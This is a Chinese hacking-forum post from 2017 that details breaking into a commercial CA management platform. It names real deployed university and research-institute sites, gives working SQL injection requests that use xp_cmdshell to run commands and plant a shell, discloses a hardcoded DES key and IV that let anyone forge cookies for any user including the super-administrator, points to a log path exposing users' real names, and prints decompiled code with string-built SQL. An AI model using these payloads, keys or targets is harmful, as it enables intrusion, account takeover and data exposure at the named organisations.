[【通过】] 渗透+逆向审计挖掘北京环宇通达CA正版系统漏洞

[复制链接]
s1m0n 发表于 2017-2-19 18:39:40 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 7

本帖最后由 s1m0n 于 2017-2-19 18:39 编辑

北京环宇通达CA正版系统存在漏洞,有如下客户
1.png

随便搜索,发现如下网站
http://windows.ioa.ac.cn/
http://softms.sdu.edu.cn/
http://ca.issas.ac.cn/login.aspx
http://202.127.19.61/


系统存在注入,普通用户在``操作日志->我的操作日志->关键字查询处``存在SQL注入。而且支持stacked query。

在数据库中创建表
GET /Tab/UserLog/MylogList.aspx?1&key=')%3bCREATE TABLE tmp(DATA VARCHAR(5000))%3b%20%2d%2d%20%44&mid=88 HTTP/1.1

执行命令
GET /Tab/UserLog/MylogList.aspx?1&key=')%3bINSERT+tmp+EXEC+master.dbo.xp_cmdshell+'whoami'%3b%20%2d%2d%20%44&mid=88

可以直接写入shell



static/image/hrline/5.gif

拿到dll,做逆向,获得部分源代码。

漏洞1 日志遍历
在Web目录下log/年月/年月日.txt 即为日志。例如view-source:http://windows.ioa.ac.cn/log/201702/20170209.txt

泄漏用户名,用户ID和真实姓名


漏洞2
任意用户cookie伪造
由于各客户登陆方式不同,由用SSO的,有ldap认证的,可能有的无法复现。下图为一些登陆方式,可以看到,几乎每个客户都开发了一种。

t0150c9a2745c4c1357.png
我们看用户cookie的生成。SetSession直接加密uid,代码如下

[C#] 纯文本查看 复制代码
HttpCookie userCookie = new HttpCookie("HyUserInfo");
                        StringEncryption s = new StringEncryption();
                        userCookie.Value = s.Encrypt(ui.UserId.ToString());
                        HttpContext.Current.Response.Cookies.Add(userCookie);
 

加密函数如下
[C#] 纯文本查看 复制代码
public string Encrypt(string sourceString)
                {
                        byte[] btKey = System.Text.Encoding.Default.GetBytes(this.key);
                        byte[] btIV = System.Text.Encoding.Default.GetBytes(this.iv);
                        System.Security.Cryptography.DESCryptoServiceProvider des = new System.Security.Cryptography.DESCryptoServiceProvider();
                        string result;
                        using (System.IO.MemoryStream ms = new System.IO.MemoryStream())
                        {
                                byte[] inData = System.Text.Encoding.Default.GetBytes(sourceString);
                                try
                                {
                                        using (System.Security.Cryptography.CryptoStream cs = new System.Security.Cryptography.CryptoStream(ms, des.CreateEncryptor(btKey, btIV), System.Security.Cryptography.CryptoStreamMode.Write))
                                        {
                                                cs.Write(inData, 0, inData.Length);
                                                cs.FlushFinalBlock();
                                        }
                                        result = System.Convert.ToBase64String(ms.ToArray());
                                }
                                catch
                                {
                                        throw;
                                }
                        }
                        return result;
                }

key和iv向量都是死的
[C#] 纯文本查看 复制代码
private string iv = "HYTDCAPT";
                private string key = "SHILPKEY";


加密的明文居然是用户ID,用户ID是从1递增的。直接可以登陆所有用户,且是任意用户。
另外,ID为1的用户是超级管理员,用户名为hytdadmin,因此获得超级管理员权限,能登陆后台。

例如,登陆id为3的用户

t013f2ab583657eabd5.png
t01de6851a25d888185.png

漏洞3 多处SQL注入
getshell使用的是普通用户在我的日志中->搜索日志存在SQL注入漏洞。我们看代码:

[C#] 纯文本查看 复制代码
System.Text.StringBuilder strWhere = new System.Text.StringBuilder();
                        System.Text.StringBuilder urlStr = new System.Text.StringBuilder();
                        this.ui = BaseUser.GetUserInfo();
                        this.mid = System.Convert.ToInt32(base.Request.QueryString["mid"]);
                        this.PageSize = BaseModule.GetDisplayLine(this.mid);
                        if (!base.IsPostBack)
                        {
                                this.PageIndex = 1;
                                strWhere.Append(" UserID=" + this.ui.UserId);
                                this.PageIndex = System.Convert.ToInt32(base.Request.QueryString["page"]);
                                if (this.PageIndex == 0)
                                {
                                        this.PageIndex = 1;
                                }
                                string typename = base.Request.QueryString["ltsName"];
                                if (!string.IsNullOrEmpty(typename))
                                {
                                        this.ltsName = typename;
                                }
                                this.key = base.Request.QueryString["key"];
                                this.lts = int.Parse((base.Request.QueryString["lts"] == null) ? "0" : base.Request.QueryString["lts"]);
                                this.begt = base.Request.QueryString["begt"];
                                this.endt = base.Request.QueryString["endt"];
                                if (this.key != null && this.key != "")
                                {
                                        urlStr.Append("&key=" + HttpContext.Current.Server.UrlEncode(this.key));
                                        strWhere.Append(string.Concat(new string[]
                                        {
                                                " and (LogTitle like '%",
                                                this.key,
                                                "%' or RealName like '%",
                                                this.key,
                                                "%' or LogRecord like '%",
                                                this.key,
                                                "%')"
                                        }));
                                }
                                if (this.lts > 0)
                                {
                                        urlStr.Append("<=" + this.lts);
                                        strWhere.Append(" and LogType=" + this.lts);
                                }
                                if (this.begt != null && this.begt != "" && this.endt != null && this.endt != "")
                                {
                                        urlStr.Append("&begt=" + this.begt + "&endt=" + this.endt);
                                        strWhere.Append(string.Concat(new string[]
                                        {
                                                " and DateTime>='",
                                                this.begt,
                                                " 00:00:00' and DateTime<='",
                                                this.endt,
                                                " 23:59:59'"
                                        }));
                                }
                                else
                                {
                                        if (this.begt != null && this.begt != "")
                                        {
                                                urlStr.Append("&begt=" + this.begt);
                                                strWhere.Append(" and DateTime>='" + this.begt + " 00:00:00'");
                                        }
                                        if (this.endt != null && this.endt != "")
                                        {
                                                urlStr.Append("&endt=" + this.endt);
                                                strWhere.Append(" and DateTime<='" + this.endt + " 23:59:59'");
                                        }
                                }
                                string strOrder = " LID desc";
                                HYTD.CAPlatform.BLL.TB_Log Bll_Log = new HYTD.CAPlatform.BLL.TB_Log();
                                this.Repeater1.DataSource = Bll_Log.GetList(this.PageSize, this.PageIndex, strOrder, strWhere.ToString()).Tables[0];
                                this.Repeater1.DataBind();
                                HYTD.CAPlatform.BLL.TB_Module mTitle = new HYTD.CAPlatform.BLL.TB_Module();
                                object Totle = Bll_Log.GetRecordCount(strWhere.ToString());
                                string FileUrl = string.Concat(new object[]
                                {
                                        "MylogList.aspx?1",
                                        urlStr,
                                        "&mid=",
                                        this.mid
                                });
                                string url = "";
                                string ShowJump = "true";
                                int pagestyle = 2;
                                this.cutepage.Text = GetPage.PageStr(FileUrl, url, System.Convert.ToInt32(Totle), this.PageSize, this.PageIndex, ShowJump, pagestyle);
                                this.Repeater1.Dispose();
                                if (System.Convert.ToInt32(Totle) < 1)
                                {
                                        this.noinfo.Visible = true;
                                        this.noinfo.Text = "<tr><td colspan=\"8\">没有数据....</td></tr>";
                                }
                        }

直接获取用户输入的关键字,时间等赋值,而后拼接给strWhere,然后调用Bll_Log.GetList, Bll_Log.GetList调用dal.GetList, dal.GetList调用DbHelperSQL.GetRecordByPage,看代码

直接拼接,然后使用Query函数

[C#] 纯文本查看 复制代码
// HYTD.CAPlatform.DBUtility.DbHelperSQL
public static DataSet GetRecordByPage(string TableName, string mainfldName, string fldName, int pageSize, int currentPage, string strOrder, string strWhere)
{
        if (strOrder != "")
        {
                strOrder = " order by " + strOrder;
        }
        string strSQL;
        if (currentPage > 1)
        {
                int subpage = (currentPage - 1) * pageSize;
                if (strWhere != "")
                {
                        strSQL = string.Concat(new object[]
                        {
                                "select top ",
                                pageSize,
                                "  ",
                                fldName,
                                " from ",
                                TableName,
                                "  where ",
                                mainfldName,
                                " not in (select top ",
                                subpage.ToString(),
                                " ",
                                mainfldName,
                                " from ",
                                TableName,
                                "  where ",
                                strWhere,
                                " ",
                                strOrder,
                                " )  and ",
                                strWhere,
                                " ",
                                strOrder
                        });
                }
                else
                {
                        strSQL = string.Concat(new object[]
                        {
                                "select top ",
                                pageSize,
                                "  ",
                                fldName,
                                " from ",
                                TableName,
                                "  where  ",
                                mainfldName,
                                " not in (select top ",
                                subpage.ToString(),
                                " ",
                                mainfldName,
                                " from ",
                                TableName,
                                "  ",
                                strOrder,
                                " )  ",
                                strOrder
                        });
                }
        }
        else if (strWhere != "")
        {
                strSQL = string.Concat(new object[]
                {
                        "select top ",
                        pageSize,
                        "  ",
                        fldName,
                        " from ",
                        TableName,
                        "  where ",
                        strWhere,
                        " ",
                        strOrder
                });
        }
        else
        {
                strSQL = string.Concat(new object[]
                {
                        "select top ",
                        pageSize,
                        "  ",
                        fldName,
                        " from ",
                        TableName,
                        "  ",
                        strOrder
                });
        }
        return DbHelperSQL.Query(strSQL);
}


SQL注入2

管理员getshell地方很多,例如系统设置->安装软件管理,搜索可以注入。在HYTD.CAPlatform.Web.ashx.DownloadSoft中。查看代码:

[C#] 纯文本查看 复制代码
string strName = WebUtil.GetQueryValue<string>("name", "");

这里获取strName
[C#] 纯文本查看 复制代码
if (strName != null)
                        {
                                search = strName.Trim();
                        }


赋值给search
[C#] 纯文本查看 复制代码
if (search != "")
                        {
                                search = " name like '%" + search + "%'";
                                where = where + " and " + search;
                        }

直接拼接到SQL语句
[C#] 纯文本查看 复制代码
{
                                dt = this.bll.GetSoftInfoForSortDownCount(this.model, where, ConvertHelper.GetInteger(ConfigurationManager.AppSettings.Get("pageSize")), pageindex, order);
                        }
                        else
                        {
                                dt = this.bll.GetSoftInfo(this.model, where, ConvertHelper.GetInteger(ConfigurationManager.AppSettings.Get("pageSize")), pageindex, order);
                        }

调用函数执行。
[C#] 纯文本查看 复制代码
// HYTD.CAPlatform.DAL.TB_SoftDownList
public DataTable GetSoftInfoForSortDownCount(TB_SoftDownList model, string where, int pagesize, int pageindex, string strOrder)
{
        StringBuilder strsql = new StringBuilder();
        string Where = string.Empty;
        if (where != "")
        {
                Where = where;
        }
        else
        {
                Where = "status=1";
        }
        strsql.Append("select top " + pagesize + "  *,(mark/(case man when 0 then 1 else man end))as softcomm from tb_softdownlist \r\n            left join (select OS_SoftID,count(OS_SoftID) sort from TB_OpreatingSoftware group by OS_SoftID ) b on TB_SoftDownList.id=b.OS_SoftID\r\n            where id not in ");
        strsql.Append(string.Concat(new object[]
        {
                "(select top ",
                pagesize * (pageindex - 1),
                " id from tb_softdownlist left join (select OS_SoftID,count(OS_SoftID) sort \r\n            from TB_OpreatingSoftware group by OS_SoftID ) b on TB_SoftDownList.id=b.OS_SoftID where ",
                Where,
                strOrder,
                ") "
        }));
        strsql.Append(" and " + Where + " " + strOrder);
        return DbHelperSQL.Query(strsql.ToString()).Tables[0];
}

直接拼接,导致SQL注入。


SQL注入3

管理员查看用户日志

[C#] 纯文本查看 复制代码
this.key = base.Request.QueryString["key"];
                                this.lts = int.Parse((base.Request.QueryString["lts"] == null) ? "0" : base.Request.QueryString["lts"]);
                                this.begt = base.Request.QueryString["begt"];
                                this.endt = base.Request.QueryString["endt"];
                                string typename = base.Request.QueryString["ltsName"];
                                if (!string.IsNullOrEmpty(typename))
                                {
                                        this.ltsName = typename;
                                }
                                if (this.PageIndex == 0)
                                {
                                        this.PageIndex = 1;
                                }
                                if (this.key != null && this.key != "")
                                {
                                        urlStr.Append("&key=" + HttpContext.Current.Server.UrlEncode(this.key));
                                        strWhere.Append(string.Concat(new string[]
                                        {
                                                " and (LogTitle like '%",
                                                this.key,
                                                "%' or RealName like '%",
                                                this.key,
                                                "%' or LogRecord like '%",
                                                this.key,
                                                "%')"
                                        }));
                                }
                                if (this.lts > 0)
                                {
                                        urlStr.Append("<s=" + this.lts);
                                        strWhere.Append(" and LogType=" + this.lts);
                                }
                                if (this.begt != null && this.begt != "" && this.endt != null && this.endt != "")
                                {
                                        urlStr.Append("&begt=" + this.begt + "&endt=" + this.endt);
                                        strWhere.Append(string.Concat(new string[]
                                        {
                                                " and DateTime>='",
                                                this.begt,
                                                " 00:00:00' and DateTime<='",
                                                this.endt,
                                                " 23:59:59'"
                                        }));
                                }
                                else
                                {
                                        if (this.begt != null && this.begt != "")
                                        {
                                                urlStr.Append("&begt=" + this.begt);
                                                strWhere.Append(" and DateTime>='" + this.begt + " 00:00:00'");
                                        }
                                        if (this.endt != null && this.endt != "")
                                        {
                                                urlStr.Append("&endt=" + this.endt);
                                                strWhere.Append(" and DateTime<='" + this.endt + " 23:59:59'");
                                        }
                                }

直接获取key,begt,endt,并且拼接进入strWhere,然后调用Bll_Log.GetList

[C#] 纯文本查看 复制代码
string strOrder = " LID desc";
                                HYTD.CAPlatform.BLL.TB_Log Bll_Log = new HYTD.CAPlatform.BLL.TB_Log();
                                this.Repeater1.DataSource = Bll_Log.GetList(this.PageSize, this.PageIndex, strOrder, strWhere.ToString()).Tables[0];
  

后面的过程跟第一个一样,就不多说了。




评分

参与人数 1酒票 +5 收起 理由
管理05 + 5 欢迎加入90!

查看全部评分

any3ite 发表于 2017-2-20 10:12:55 | 显示全部楼层

正式成员|主题 |帖子 |积分 144

精品文章感谢分享
一人一刀下北凉 发表于 2017-2-22 14:00:21 | 显示全部楼层

正式成员|主题 |帖子 |积分 129

thx for share
这只猪 发表于 2017-3-21 12:57:28 | 显示全部楼层

正式成员|主题 |帖子 |积分 122

厉害厉害,膜拜会审计net的牛
vercher 发表于 2017-3-22 15:05:36 | 显示全部楼层

正式成员|主题 |帖子 |积分 97

weblog 这么叼。。。。。
快速回复 返回顶部 返回列表